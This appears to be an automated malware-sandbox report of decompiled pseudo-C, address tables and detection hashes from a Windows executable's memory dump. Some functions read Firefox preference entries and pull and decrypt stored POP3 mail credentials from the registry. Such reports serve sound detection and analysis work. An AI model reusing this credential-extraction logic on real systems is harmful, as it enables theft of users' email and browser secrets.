						} while (_t86 != 0);
					}
					_v8 = 1;
				}
				if(E004014EA(0x448, _t80, _a4) == 1) {
					E0040851B( *(_t80 + 0xc), ( *(_t80 + 0xc))[2]);
					InvalidateRect(( *(_t80 + 0xc))[2], 0, 0);
				}
				_t47 = SetFocus(_a8);
				if(_v8 != 0) {
					_push( *(_t80 + 0x10));
					L00412096();
				}
				return _t47;
			}


















                                                                                                                                                                  0x0040596a
                                                                                                                                                                  0x0040596e
                                                                                                                                                                  0x00405973
                                                                                                                                                                  0x00405975
                                                                                                                                                                  0x00405978
                                                                                                                                                                  0x0040597b
                                                                                                                                                                  0x00405983
                                                                                                                                                                  0x0040598b
                                                                                                                                                                  0x00405985
                                                                                                                                                                  0x00405985
                                                                                                                                                                  0x00405987
                                                                                                                                                                  0x00405987
                                                                                                                                                                  0x0040598d
                                                                                                                                                                  0x00405990
                                                                                                                                                                  0x00405992
                                                                                                                                                                  0x00405994
                                                                                                                                                                  0x00405996
                                                                                                                                                                  0x00405997
                                                                                                                                                                  0x0040599d
                                                                                                                                                                  0x0040599d
                                                                                                                                                                  0x004059a3
                                                                                                                                                                  0x004059a6
                                                                                                                                                                  0x004059b0
                                                                                                                                                                  0x004059b1
                                                                                                                                                                  0x004059b4
                                                                                                                                                                  0x004059bd
                                                                                                                                                                  0x004059be
                                                                                                                                                                  0x004059cd
                                                                                                                                                                  0x004059cf
                                                                                                                                                                  0x004059dd
                                                                                                                                                                  0x004059e2
                                                                                                                                                                  0x004059e5
                                                                                                                                                                  0x004059ea
                                                                                                                                                                  0x004059f1
                                                                                                                                                                  0x004059f4
                                                                                                                                                                  0x004059fd
                                                                                                                                                                  0x004059fe
                                                                                                                                                                  0x00405a06
                                                                                                                                                                  0x00405a09
                                                                                                                                                                  0x00405a0b
                                                                                                                                                                  0x00405a0d
                                                                                                                                                                  0x00405a10
                                                                                                                                                                  0x00405a18
                                                                                                                                                                  0x00405a1b
                                                                                                                                                                  0x00405a1b
                                                                                                                                                                  0x00405a0d
                                                                                                                                                                  0x00405a1e
                                                                                                                                                                  0x00405a1e
                                                                                                                                                                  0x00405a36
                                                                                                                                                                  0x00405a3e
                                                                                                                                                                  0x00405a4b
                                                                                                                                                                  0x00405a4b
                                                                                                                                                                  0x00405a54
                                                                                                                                                                  0x00405a5d
                                                                                                                                                                  0x00405a5f
                                                                                                                                                                  0x00405a62
                                                                                                                                                                  0x00405a67
                                                                                                                                                                  0x00405a6b

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2313361498-0
                                                                                                                                                                  • Opcode ID: a580d9142bc32eaab65664efd4de07b17d343628356770d299779b1e7220968e
                                                                                                                                                                  • Instruction ID: c9d5e52e17e49b2fdf2665c470f327c4663aeb176fcf1135955ad165868745cd
                                                                                                                                                                  • Opcode Fuzzy Hash: a580d9142bc32eaab65664efd4de07b17d343628356770d299779b1e7220968e
                                                                                                                                                                  • Instruction Fuzzy Hash: 113183B2600601AFDB249F79D985A2AF7A4FB08354710863FF55AD7290DB78AC50CF58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040A7B2, Relevance: 12.1, APIs: 8, Instructions: 76COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E0040A7B2(void* __esi) {
				struct HDWP__* _v8;
				int _v12;
				intOrPtr _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* _t32;
				int _t60;
				int _t65;

				if( *((intOrPtr*)(__esi + 0x124)) != 0) {
					GetClientRect( *(__esi + 0x108),  &_v32);
					GetWindowRect( *(__esi + 0x114),  &_v48);
					_t65 = _v48.bottom - _v48.top + 1;
					GetWindowRect( *(__esi + 0x118),  &_v48);
					_v12 = _v32.right - _v32.left;
					_t60 = _v48.bottom - _v48.top + 1;
					_v16 = _v32.bottom - _v32.top;
					_v8 = BeginDeferWindowPos(3);
					DeferWindowPos(_v8,  *(__esi + 0x118), 0, 0, 0, _v12, _t60, 4);
					DeferWindowPos(_v8,  *(__esi + 0x114), 0, 0, _v32.bottom - _t65 + 1, _v12, _t65, 6);
					DeferWindowPos(_v8,  *( *((intOrPtr*)(__esi + 0x370)) + 0x184), 0, 0, _t60, _v12, _v16 - _t60 - _t65, 4);
					return EndDeferWindowPos(_v8);
				}
				return _t32;
			}











                                                                                                                                                                  0x0040a7bf
                                                                                                                                                                  0x0040a7d1
                                                                                                                                                                  0x0040a7e7
                                                                                                                                                                  0x0040a7f9
                                                                                                                                                                  0x0040a7fa
                                                                                                                                                                  0x0040a808
                                                                                                                                                                  0x0040a813
                                                                                                                                                                  0x0040a814
                                                                                                                                                                  0x0040a823
                                                                                                                                                                  0x0040a834
                                                                                                                                                                  0x0040a854
                                                                                                                                                                  0x0040a87b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a88b
                                                                                                                                                                  0x0040a88d

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Defer$Rect$BeginClient
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2126104762-0
                                                                                                                                                                  • Opcode ID: e3d9293826481cef379b2e174ab533f7da62d5a41b3e9301ba56b14c5600b15e
                                                                                                                                                                  • Instruction ID: 09cbeee5e8014f0efd252c30326660bc7ddd54a992e069e65e32613af5811a3b
                                                                                                                                                                  • Opcode Fuzzy Hash: e3d9293826481cef379b2e174ab533f7da62d5a41b3e9301ba56b14c5600b15e
                                                                                                                                                                  • Instruction Fuzzy Hash: AF21C871A00209FFDB11DFA8DD89FEEBBB9FB08311F104465FA55A2160CA71AA519B24
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040649B, Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                                                  			E0040649B(void* __edx, struct HWND__* _a4) {
				struct HDC__* _v12;
				struct tagRECT _v28;
				struct HDC__* _t19;
				signed int _t32;
				int _t33;
				int _t35;
				int _t37;
				void* _t38;
				int _t39;
				intOrPtr _t40;
				intOrPtr _t45;

				_t38 = __edx;
				_t35 = GetSystemMetrics(0x11);
				_t39 = GetSystemMetrics(0x10);
				if(_t35 == 0 || _t39 == 0) {
					_t19 = GetDC(0);
					_v12 = _t19;
					_t39 = GetDeviceCaps(_t19, 8);
					_t35 = GetDeviceCaps(_v12, 0xa);
					ReleaseDC(0, _v12);
				}
				GetWindowRect(_a4,  &_v28);
				_t45 = _v28.right;
				_t40 = _v28.bottom;
				asm("cdq");
				asm("cdq");
				_t32 = _v28.top - _t40 + _t35 - 1 - _t38;
				_t37 = _v28.left - _t45 + _t39 - 1 - _t38 >> 1;
				_t33 = _t32 >> 1;
				if(_t32 < 0) {
					_t33 = 0;
				}
				if(_t37 < 0) {
					_t37 = 0;
				}
				return MoveWindow(_a4, _t37, _t33, _t45 - _v28.left + 1, _t40 - _v28.top + 1, 1);
			}














                                                                                                                                                                  0x0040649b
                                                                                                                                                                  0x004064b0
                                                                                                                                                                  0x004064b6
                                                                                                                                                                  0x004064b8
                                                                                                                                                                  0x004064c0
                                                                                                                                                                  0x004064cf
                                                                                                                                                                  0x004064d9
                                                                                                                                                                  0x004064e0
                                                                                                                                                                  0x004064e4
                                                                                                                                                                  0x004064e4
                                                                                                                                                                  0x004064f1
                                                                                                                                                                  0x004064fa
                                                                                                                                                                  0x00406503
                                                                                                                                                                  0x00406506
                                                                                                                                                                  0x00406514
                                                                                                                                                                  0x00406515
                                                                                                                                                                  0x00406517
                                                                                                                                                                  0x00406519
                                                                                                                                                                  0x0040651b
                                                                                                                                                                  0x0040651d
                                                                                                                                                                  0x0040651d
                                                                                                                                                                  0x00406521
                                                                                                                                                                  0x00406523
                                                                                                                                                                  0x00406523
                                                                                                                                                                  0x00406540

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSystemMetrics.USER32 ref: 004064AC
                                                                                                                                                                  • GetSystemMetrics.USER32 ref: 004064B2
                                                                                                                                                                  • GetDC.USER32(00000000), ref: 004064C0
                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 004064D2
                                                                                                                                                                  • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 004064DB
                                                                                                                                                                  • ReleaseDC.USER32 ref: 004064E4
                                                                                                                                                                  • GetWindowRect.USER32 ref: 004064F1
                                                                                                                                                                  • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00406536
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1999381814-0
                                                                                                                                                                  • Opcode ID: 49d5a035e180b7af43cac72741eab6a6786db33261f0c5654e3a6ca50601d200
                                                                                                                                                                  • Instruction ID: ba7d715333d017d2103329686637bd52cca5eef1020c3fd7483cce7c10731540
                                                                                                                                                                  • Opcode Fuzzy Hash: 49d5a035e180b7af43cac72741eab6a6786db33261f0c5654e3a6ca50601d200
                                                                                                                                                                  • Instruction Fuzzy Hash: 1011A232A00219AFDF109FB8DC09BEF7FB9EB44351F054135EE06E3290DA70A9418A90
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00406073, Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemorystringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                                  			E00406073(void* _a4) {
				signed int _t11;
				int _t13;
				void* _t17;
				signed int _t19;
				void* _t22;

				_t22 = _a4;
				_t19 = 0;
				EmptyClipboard();
				if(_t22 != 0) {
					_t2 = strlen(_t22) + 1; // 0x1
					_t13 = _t2;
					_t17 = GlobalAlloc(0x2000, _t13);
					if(_t17 != 0) {
						memcpy(GlobalLock(_t17), _t22, _t13);
						GlobalUnlock(_t17);
						_t11 = SetClipboardData(1, _t17);
						asm("sbb esi, esi");
						_t19 =  ~( ~_t11);
					}
				}
				CloseClipboard();
				return _t19;
			}








                                                                                                                                                                  0x00406074
                                                                                                                                                                  0x00406079
                                                                                                                                                                  0x0040607b
                                                                                                                                                                  0x00406083
                                                                                                                                                                  0x0040608e
                                                                                                                                                                  0x0040608e
                                                                                                                                                                  0x0040609d
                                                                                                                                                                  0x004060a1
                                                                                                                                                                  0x004060ad
                                                                                                                                                                  0x004060b6
                                                                                                                                                                  0x004060bf
                                                                                                                                                                  0x004060c9
                                                                                                                                                                  0x004060cb
                                                                                                                                                                  0x004060cb
                                                                                                                                                                  0x004060ce
                                                                                                                                                                  0x004060cf
                                                                                                                                                                  0x004060d9

                                                                                                                                                                  APIs
                                                                                                                                                                  • EmptyClipboard.USER32(?,?,0040AFC1,?), ref: 0040607B
                                                                                                                                                                  • strlen.MSVCRT ref: 00406088
                                                                                                                                                                  • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040AFC1,?), ref: 00406097
                                                                                                                                                                  • GlobalLock.KERNEL32 ref: 004060A4
                                                                                                                                                                  • memcpy.MSVCRT ref: 004060AD
                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004060B6
                                                                                                                                                                  • SetClipboardData.USER32 ref: 004060BF
                                                                                                                                                                  • CloseClipboard.USER32(?,?,0040AFC1,?), ref: 004060CF
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpystrlen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3116012682-0
                                                                                                                                                                  • Opcode ID: c70b900a696f57a29a369809a0454994a779be389cf8b88d1f6a35ab18b15240
                                                                                                                                                                  • Instruction ID: d09f43d2fefddb7d7ea69405cde3b0bd2fff4912bca4764858ce7f0ae225efb5
                                                                                                                                                                  • Opcode Fuzzy Hash: c70b900a696f57a29a369809a0454994a779be389cf8b88d1f6a35ab18b15240
                                                                                                                                                                  • Instruction Fuzzy Hash: 09F090371402296BC2102FA4BC4CE9B7FACDF88B56B058139FA0AD2251DE74894486A9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040C70B, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 80%
                                                                                                                                                                  			E0040C70B(void* __eflags, intOrPtr* _a4) {
				int _v8;
				char _v12;
				intOrPtr _v16;
				void _v1029;
				void _v1039;
				char _v1040;
				void _v2063;
				void _v2064;
				void _v3087;
				void _v3088;
				void* __ebx;
				intOrPtr _t53;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t67;
				void* _t68;
				void* _t73;
				void* _t85;
				int _t86;
				void* _t106;
				int _t107;
				int _t111;
				void* _t114;
				void* _t115;
				void* _t116;

				_v1040 = 0;
				memset( &_v1039, 0, 0x3ff);
				_v3088 = 0;
				memset( &_v3087, 0, 0x3ff);
				_v2064 = 0;
				memset( &_v2063, 0, 0x3ff);
				_t116 = _t115 + 0x24;
				_t53 = E00406BA3(_a4 + 4);
				_v12 = 0;
				_v16 = _t53;
				_t54 = E0040692F(_t53,  &_v1040,  &_v1040,  &_v12);
				if(_t54 != 0) {
					do {
						_t56 = E00406A01(0, "user_pref(\"");
						_pop(_t92);
						if(_t56 != 0) {
							goto L10;
						}
						_push(0x413b10);
						_t60 = 0xb;
						_t14 = E00406A01(_t60) - 0xb; // -11
						_t92 = _t14;
						_v8 = _t92;
						if(_t92 <= 0) {
							goto L10;
						}
						_t85 = E00406A01(_t61 + 1, 0x413b18);
						_t17 = _t85 + 1; // 0x1
						_t106 = E00406A01(_t17, 0x413b10);
						if(_t106 <= 0) {
							_t28 = _t85 + 1; // 0x1
							_t67 = E00406A01(_t28, ")");
							_pop(_t92);
							_t68 = 0xfffffffe;
							_t111 = _t67 + _t68 - _t85;
							if(_t111 <= 0) {
								goto L10;
							}
							_t107 = _v8;
							memcpy( &_v3088,  &_v1029, _t107);
							 *((char*)(_t114 + _t107 - 0xc0c)) = 0;
							_t73 = _t114 + _t85 - 0x40a;
							L9:
							memcpy( &_v2064, _t73, _t111);
							_t92 = _a4;
							_t116 = _t116 + 0x18;
							 *((char*)(_t114 + _t111 - 0x80c)) = 0;
							_t59 =  *((intOrPtr*)( *_a4))( &_v3088,  &_v2064);
							if(_t59 == 0) {
								break;
							}
							goto L10;
						}
						_t20 = _t106 + 1; // 0x1
						_t111 = E00406A01(_t20, 0x413b10) - _t106 - 1;
						_pop(_t92);
						if(_t111 <= 0) {
							goto L10;
						}
						_t86 = _v8;
						memcpy( &_v3088,  &_v1029, _t86);
						 *((char*)(_t114 + _t86 - 0xc0c)) = 0;
						_t73 = _t114 + _t106 - 0x40b;
						goto L9;
						L10:
						_t59 = E0040692F(_v16, _t92,  &_v1040,  &_v12);
					} while (_t59 != 0);
					return _t59;
				}
				return _t54;
			}






























                                                                                                                                                                  0x0040c726
                                                                                                                                                                  0x0040c72c
                                                                                                                                                                  0x0040c73a
                                                                                                                                                                  0x0040c740
                                                                                                                                                                  0x0040c74e
                                                                                                                                                                  0x0040c754
                                                                                                                                                                  0x0040c75c
                                                                                                                                                                  0x0040c762
                                                                                                                                                                  0x0040c771
                                                                                                                                                                  0x0040c777
                                                                                                                                                                  0x0040c77a
                                                                                                                                                                  0x0040c783
                                                                                                                                                                  0x0040c78a
                                                                                                                                                                  0x0040c797
                                                                                                                                                                  0x0040c79e
                                                                                                                                                                  0x0040c79f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040c7aa
                                                                                                                                                                  0x0040c7ad
                                                                                                                                                                  0x0040c7ba
                                                                                                                                                                  0x0040c7ba
                                                                                                                                                                  0x0040c7bf
                                                                                                                                                                  0x0040c7c2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040c7d9
                                                                                                                                                                  0x0040c7db
                                                                                                                                                                  0x0040c7eb
                                                                                                                                                                  0x0040c7f6
                                                                                                                                                                  0x0040c83c
                                                                                                                                                                  0x0040c83f
                                                                                                                                                                  0x0040c844
                                                                                                                                                                  0x0040c849
                                                                                                                                                                  0x0040c84c
                                                                                                                                                                  0x0040c850
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040c852
                                                                                                                                                                  0x0040c864
                                                                                                                                                                  0x0040c869
                                                                                                                                                                  0x0040c871
                                                                                                                                                                  0x0040c878
                                                                                                                                                                  0x0040c881
                                                                                                                                                                  0x0040c886
                                                                                                                                                                  0x0040c88b
                                                                                                                                                                  0x0040c89c
                                                                                                                                                                  0x0040c8a4
                                                                                                                                                                  0x0040c8a8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040c8a8
                                                                                                                                                                  0x0040c7f8
                                                                                                                                                                  0x0040c805
                                                                                                                                                                  0x0040c808
                                                                                                                                                                  0x0040c809
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040c80f
                                                                                                                                                                  0x0040c821
                                                                                                                                                                  0x0040c826
                                                                                                                                                                  0x0040c82e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040c8aa
                                                                                                                                                                  0x0040c8b8
                                                                                                                                                                  0x0040c8c0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040c8c7
                                                                                                                                                                  0x0040c8cb

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpymemset$strlen$_memicmp
                                                                                                                                                                  • String ID: user_pref("
                                                                                                                                                                  • API String ID: 765841271-2487180061
                                                                                                                                                                  • Opcode ID: b6f81e50d3f8e97912bf56328f9eb2e236efc4b8b3b87e64c123cb08f78c772a
                                                                                                                                                                  • Instruction ID: c71e9d7c33fd880144b5893e014edb1d15ca38a86f0d2a268660e68eb467e50f
                                                                                                                                                                  • Opcode Fuzzy Hash: b6f81e50d3f8e97912bf56328f9eb2e236efc4b8b3b87e64c123cb08f78c772a
                                                                                                                                                                  • Instruction Fuzzy Hash: 134168769041199ADB14EB95DCC0EDA77AC9F44314F1083BBE605F7181EA389F49CF68
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004055A9, Relevance: 10.6, APIs: 7, Instructions: 126windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 61%
                                                                                                                                                                  			E004055A9(intOrPtr _a4) {
				struct HWND__* _v12;
				signed int _v16;
				int _v20;
				int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				int _v48;
				char* _v52;
				void* _v64;
				void _v319;
				char _v320;
				struct HWND__* _t53;
				intOrPtr* _t59;
				void* _t61;
				intOrPtr _t66;
				void* _t74;
				void* _t80;
				intOrPtr _t81;
				void* _t84;
				intOrPtr _t89;
				short _t91;
				signed int _t94;
				short* _t95;
				void* _t96;
				void* _t97;

				_t89 = _a4;
				_t53 = GetDlgItem( *(_t89 + 4), 0x3e9);
				_v12 = _t53;
				SendMessageA(_t53, 0x1009, 0, 0);
				SendMessageA(_v12, 0x1036, 0, 0x26);
				do {
				} while (SendMessageA(_v12, 0x101c, 0, 0) != 0);
				_push(0xc8);
				_push(0);
				_push(0);
				_push(_v12);
				_t80 = 6;
				E0040492F(0x41344f, _t80);
				_t59 =  *((intOrPtr*)(_t89 + 0xc));
				_t81 =  *((intOrPtr*)(_t59 + 4));
				_t97 = _t96 + 0x10;
				_v32 = _t81;
				_v28 =  *_t59;
				_v20 = 0;
				if(_t81 <= 0) {
					L10:
					_t61 = 2;
					E004048C0(_t61, _v12, 0, _t61);
					return SetFocus(_v12);
				} else {
					goto L3;
				}
				do {
					L3:
					_v16 = 0;
					_v24 = 0;
					do {
						_t94 = _v16 << 2;
						if( *((short*)(_v28 + _t94 + 2)) == _v20) {
							_v320 = 0;
							memset( &_v319, 0, 0xff);
							_t97 = _t97 + 0xc;
							_v52 =  &_v320;
							_v64 = 4;
							_v48 = 0xff;
							if(SendMessageA( *( *((intOrPtr*)(_a4 + 0xc)) + 8), 0x1019, _v16,  &_v64) != 0) {
								_push(_v16);
								_push(0);
								_push(_v12);
								_t84 = 5;
								_t74 = E00404978( &_v320, _t84);
								_t95 = _t94 + _v28;
								_t91 =  *_t95;
								E00404CF3(_v12, _t74, 0 | _t91 > 0x00000000);
								_t97 = _t97 + 0x18;
								if(_t91 == 0) {
									 *_t95 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10)) + _v24 + 0xc));
								}
							}
						}
						_v16 = _v16 + 1;
						_t66 = _v32;
						_v24 = _v24 + 0x14;
					} while (_v16 < _t66);
					_v20 = _v20 + 1;
				} while (_v20 < _t66);
				goto L10;
			}




























                                                                                                                                                                  0x004055b5
                                                                                                                                                                  0x004055c0
                                                                                                                                                                  0x004055d6
                                                                                                                                                                  0x004055d9
                                                                                                                                                                  0x004055e6
                                                                                                                                                                  0x004055e8
                                                                                                                                                                  0x004055f4
                                                                                                                                                                  0x004055f8
                                                                                                                                                                  0x004055fd
                                                                                                                                                                  0x004055fe
                                                                                                                                                                  0x004055ff
                                                                                                                                                                  0x00405609
                                                                                                                                                                  0x0040560a
                                                                                                                                                                  0x0040560f
                                                                                                                                                                  0x00405612
                                                                                                                                                                  0x00405617
                                                                                                                                                                  0x0040561c
                                                                                                                                                                  0x0040561f
                                                                                                                                                                  0x00405622
                                                                                                                                                                  0x00405625
                                                                                                                                                                  0x004056ff
                                                                                                                                                                  0x00405701
                                                                                                                                                                  0x00405707
                                                                                                                                                                  0x0040571c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040562b
                                                                                                                                                                  0x0040562b
                                                                                                                                                                  0x0040562b
                                                                                                                                                                  0x0040562e
                                                                                                                                                                  0x00405631
                                                                                                                                                                  0x00405637
                                                                                                                                                                  0x00405642
                                                                                                                                                                  0x00405656
                                                                                                                                                                  0x0040565c
                                                                                                                                                                  0x0040566a
                                                                                                                                                                  0x00405673
                                                                                                                                                                  0x0040567d
                                                                                                                                                                  0x0040568a
                                                                                                                                                                  0x00405695
                                                                                                                                                                  0x00405697
                                                                                                                                                                  0x004056a0
                                                                                                                                                                  0x004056a1
                                                                                                                                                                  0x004056a6
                                                                                                                                                                  0x004056a7
                                                                                                                                                                  0x004056af
                                                                                                                                                                  0x004056b1
                                                                                                                                                                  0x004056c3
                                                                                                                                                                  0x004056c8
                                                                                                                                                                  0x004056cd
                                                                                                                                                                  0x004056dd
                                                                                                                                                                  0x004056dd
                                                                                                                                                                  0x004056cd
                                                                                                                                                                  0x00405695
                                                                                                                                                                  0x004056e0
                                                                                                                                                                  0x004056e3
                                                                                                                                                                  0x004056e6
                                                                                                                                                                  0x004056ea
                                                                                                                                                                  0x004056f3
                                                                                                                                                                  0x004056f6
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4281309102-0
                                                                                                                                                                  • Opcode ID: b2ff56cee8ee5384e194c9e88251dfd2c05582b0ec5024aa31fc40173aaba44b
                                                                                                                                                                  • Instruction ID: 7cc6a8daf3229b7d8e0d7717536759f0385f0427a9067e31b35bb84d252c6e93
                                                                                                                                                                  • Opcode Fuzzy Hash: b2ff56cee8ee5384e194c9e88251dfd2c05582b0ec5024aa31fc40173aaba44b
                                                                                                                                                                  • Instruction Fuzzy Hash: 3D414BB5D00109BFDB209F98DC85DAEBBB9EF04358F00846AE914B7291D7759E50CF94
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004071D6, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                                                  			E004071D6(void* __ecx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v12;
				short* _v16;
				unsigned int _v20;
				char* _v24;
				char _v28;
				char _v288;
				char _v544;
				char _v800;
				char _v1056;
				char _v1584;
				void _v2607;
				char _v2608;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t36;
				void* _t63;
				char* _t66;
				void* _t68;

				_t63 = __ecx;
				_v2608 = 0;
				memset( &_v2607, 0, 0x3ff);
				_v12 = 0x400;
				_v1056 = 0;
				_v800 = 0;
				_v544 = 0;
				_v288 = 0;
				_t36 = E0040F214(_t63, _a8, "POP3_credentials",  &_v2608,  &_v12);
				_t72 = _t36;
				if(_t36 != 0) {
					return _t36;
				}
				_t67 =  &_v1584;
				E004046E1( &_v1584);
				if(E004047AA( &_v1584, _t72) != 0) {
					_v24 =  &_v2608;
					_v28 = _v12;
					if(E0040481B(_t67,  &_v28, 0,  &_v20) != 0) {
						 *((char*)(_t68 + WideCharToMultiByte(0, 0, _v16, _v20 >> 1,  &_v544, 0xfd, 0, 0) - 0x21c)) = 0;
						LocalFree(_v16);
						E0040F1F1(0xff, _t63, _a8, "POP3_name",  &_v800);
						E0040F1F1(0xff, _t63, _a8, "POP3_host",  &_v288);
						_t66 =  &_v1056;
						E004060DA(0xff, _t66, _a12);
						 *((intOrPtr*)( *_a4))(_t66);
					}
				}
				return E004047FB( &_v1584);
			}






















                                                                                                                                                                  0x004071d6
                                                                                                                                                                  0x004071f1
                                                                                                                                                                  0x004071f7
                                                                                                                                                                  0x0040720f
                                                                                                                                                                  0x00407216
                                                                                                                                                                  0x0040721c
                                                                                                                                                                  0x00407222
                                                                                                                                                                  0x00407228
                                                                                                                                                                  0x0040722e
                                                                                                                                                                  0x00407236
                                                                                                                                                                  0x00407238
                                                                                                                                                                  0x00407303
                                                                                                                                                                  0x00407303
                                                                                                                                                                  0x0040723e
                                                                                                                                                                  0x00407244
                                                                                                                                                                  0x00407250
                                                                                                                                                                  0x0040725c
                                                                                                                                                                  0x00407262
                                                                                                                                                                  0x00407277
                                                                                                                                                                  0x0040729b
                                                                                                                                                                  0x004072a2
                                                                                                                                                                  0x004072be
                                                                                                                                                                  0x004072d4
                                                                                                                                                                  0x004072dc
                                                                                                                                                                  0x004072e2
                                                                                                                                                                  0x004072f2
                                                                                                                                                                  0x004072f2
                                                                                                                                                                  0x00407277
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 004071F7
                                                                                                                                                                    • Part of subcall function 0040F214: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040245F,?), ref: 0040F22A
                                                                                                                                                                    • Part of subcall function 004046E1: strcpy.MSVCRT ref: 00404730
                                                                                                                                                                    • Part of subcall function 004047AA: LoadLibraryA.KERNELBASE(?,0040DC6C,80000001,7479F420), ref: 004047B2
                                                                                                                                                                    • Part of subcall function 004047AA: GetProcAddress.KERNEL32(00000000,?), ref: 004047CA
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,0040738B,?,000000FD,00000000,00000000,?,00000000,0040738B,?,?,?,?,00000000), ref: 00407292
                                                                                                                                                                  • LocalFree.KERNEL32(?,?,?,?,?,00000000,7479ED80,?), ref: 004072A2
